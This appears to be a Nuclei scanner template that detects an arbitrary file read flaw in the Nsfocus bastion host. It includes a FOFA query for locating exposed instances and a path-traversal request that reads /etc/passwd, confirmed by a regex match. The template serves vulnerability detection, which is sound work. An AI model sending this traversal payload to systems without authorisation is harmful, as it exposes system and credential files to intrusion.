id: nsfocus-lfi

info:
  name: Nsfocus - Arbitrary File Read
  author: ritikchaddha
  severity: high
  description: |
    Nsfocus bastion has an Arbitrary File Read Vulnerability through '/webconf/GetFile/'.
  reference:
    - https://forum.butian.net/article/250
  metadata:
    max-request: 2
    fofa-query: body="'/needUsbkey.php?username='"
  tags: nsfocus,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /user/requireLogin HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(tolower(body), 'nsfocus')"
          - "status_code == 200"
        condition: and
        internal : true

  - raw:
      - |
        GET /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and